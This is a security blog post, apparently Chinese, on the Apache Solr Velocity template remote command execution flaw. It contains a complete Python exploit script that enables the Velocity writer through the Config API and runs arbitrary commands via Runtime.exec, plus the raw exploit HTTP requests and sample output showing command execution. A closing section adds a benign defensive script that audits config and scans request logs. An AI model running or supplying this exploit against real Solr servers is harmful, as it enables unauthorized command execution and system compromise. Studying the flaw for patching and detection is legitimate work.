Apache Solr Command Execution

Author: 情话 | Published 2020-03-27 15:10:04

Using Docker

Pull the official image and run a container, mapping the Solr port (8983) to host port 8081:

 docker pull solr
 docker run --name solr2 -d -p 8081:8983 solr

Verification script

#!/usr/bin/env python3
# coding: utf-8

import json
import sys

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

# Only needed when debugging through an intercepting proxy; pass
# proxies=proxies to the requests calls below to use it.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}


if len(sys.argv) != 3:
    print("[+] Usage : ./solr_rce.py target command")
    sys.exit(1)

target = sys.argv[1]
command = sys.argv[2]


getPathUrl = '/solr/admin/cores?indexInfo=false&wt=json'
try:
    # Take the first core name reported by the cores admin API
    Path = list(requests.get(target + getPathUrl).json()['status'].keys())[0]
    # requests computes Content-Length itself; the hard-coded value was dropped
    headers = {'Content-Type': 'application/json'}
    data = '''{
      "update-queryresponsewriter": {
        "startup": "lazy",
        "name": "velocity",
        "class": "solr.VelocityResponseWriter",
        "template.base.dir": "",
        "solr.resource.loader.enabled": "true",
        "params.resource.loader.enabled": "true"
      }
    }'''
    req = requests.post(target + '/solr/' + Path + '/config', headers=headers, data=data)

    if req.status_code == 404:
        print("[-] failed !")
        sys.exit(1)
    elif req.status_code == 200:
        print("[+] Set Config Success!")
    # exec command
    payload = '/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27' + command + '%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
    req = requests.get(target + '/solr/' + Path + payload)
    print(req.text)
# Narrowed from a bare except, which also swallowed the sys.exit() calls above
except (requests.RequestException, ValueError, KeyError, IndexError):
    print('解析错误')

Usage

# python solr_rce2.py http://xx.xxx.xxx.xx whoami
[+] Set Config Success!
 0 root

Reference: https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt

Apache Solr RCE via Velocity template

Set "params.resource.loader.enabled" as true.

Request:
========================================================================
POST /solr/test/config HTTP/1.1
Host: solr:8983
Content-Type: application/json
Content-Length: 259

{
  "update-queryresponsewriter": {
    "startup": "lazy",
    "name": "velocity",
    "class": "solr.VelocityResponseWriter",
    "template.base.dir": "",
    "solr.resource.loader.enabled": "true",
    "params.resource.loader.enabled": "true"
  }
}
========================================================================


RCE via velocity template
Request:
========================================================================
GET /solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27id%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: localhost:8983
========================================================================


Response:
========================================================================
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Content-Length: 56

     0  uid=8983(solr) gid=8983(solr) groups=8983(solr)
========================================================================
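Both steps above leave traces a defender can check for: the Config API write that turns on params.resource.loader.enabled, and a select request with wt=velocity that carries its template inline in v.template.* parameters. The following script is an added example written for this article, not part of the original post or of Solr's own tooling. It audits a core's config for a VelocityResponseWriter that accepts request-supplied templates, and scans NCSA-style request-log lines (the Jetty request log format) for either indicator. The config JSON shape (config.queryResponseWriter.<name>) is assumed to match what GET /solr/<core>/config returns; the config sample and the log lines are constructed, and the inline template in the sample log is a harmless stand-in.

```python
#!/usr/bin/env python3
"""Defensive checks for the Solr VelocityResponseWriter weakness discussed above.

Written for this article (not Solr's own tooling):
  1. audit_config(): flag velocity writers whose params.resource.loader.enabled
     is true (config shape assumed to match GET /solr/<core>/config).
  2. scan_request_log(): flag request-log lines that write to the Config API
     or select with wt=velocity plus an inline v.template.* parameter.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample of a core config; shape is an assumption.
SAMPLE_CONFIG = {
    "config": {
        "queryResponseWriter": {
            "json": {"class": "solr.JSONResponseWriter"},
            "velocity": {
                "class": "solr.VelocityResponseWriter",
                "startup": "lazy",
                "template.base.dir": "",
                "solr.resource.loader.enabled": "true",
                "params.resource.loader.enabled": "true",
            },
        }
    }
}


def audit_config(config):
    """Return the names of velocity writers that load templates from request params."""
    writers = config.get("config", {}).get("queryResponseWriter", {})
    risky = []
    for name, spec in writers.items():
        if not isinstance(spec, dict):
            continue
        if "VelocityResponseWriter" not in str(spec.get("class", "")):
            continue
        flag = str(spec.get("params.resource.loader.enabled", "false")).lower()
        if flag == "true":
            risky.append(name)
    return risky


# NCSA-style request log line: ip ident user [ts] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
CONFIG_PATH = re.compile(r"^/solr/[^/]+/config/?$")

# Constructed sample log lines; the velocity template here is a harmless stand-in.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Mar/2020:15:10:01 +0800] "GET /solr/test/select?q=*:*&wt=json HTTP/1.1" 200 187',
    '10.0.0.9 - - [27/Mar/2020:15:10:02 +0800] "POST /solr/test/config HTTP/1.1" 200 45',
    '10.0.0.9 - - [27/Mar/2020:15:10:04 +0800] "GET /solr/test/select?q=1&wt=velocity&v.template=custom&v.template.custom=%23set($x=1)$x HTTP/1.1" 200 56',
    '10.0.0.5 - - [27/Mar/2020:15:10:05 +0800] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 300',
]


def classify(line):
    """Return a reason string when a line matches an indicator, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    method, target = m.group("method"), m.group("target")
    parts = urlsplit(target)
    # Config API writes change the core's solrconfig at runtime; they should be rare and reviewed
    if method == "POST" and CONFIG_PATH.match(parts.path):
        return "config-api-write"
    params = parse_qs(parts.query)  # percent-decodes values, ignores empty pairs such as "&&"
    if "velocity" in [v.lower() for v in params.get("wt", [])]:
        inline = sorted(k for k in params if k.startswith("v.template"))
        if inline:
            return "velocity-inline-template:" + ",".join(inline)
        return "velocity-writer"
    return None


def scan_request_log(lines):
    """Return (client ip, reason) for every line that matches an indicator."""
    hits = []
    for line in lines:
        reason = classify(line)
        if reason:
            hits.append((LOG_RE.match(line).group("ip"), reason))
    return hits


if __name__ == "__main__":
    print("writers accepting request templates:", audit_config(SAMPLE_CONFIG))
    for ip, reason in scan_request_log(SAMPLE_LOG):
        print(ip, reason)
```

The fix on the configuration side is the same key the gist toggles, set the other way: "params.resource.loader.enabled" must be "false" (or the velocity writer removed), and write access to /solr/<core>/config should be restricted to authenticated administrators, since any client that can reach the Config API can turn the setting back on.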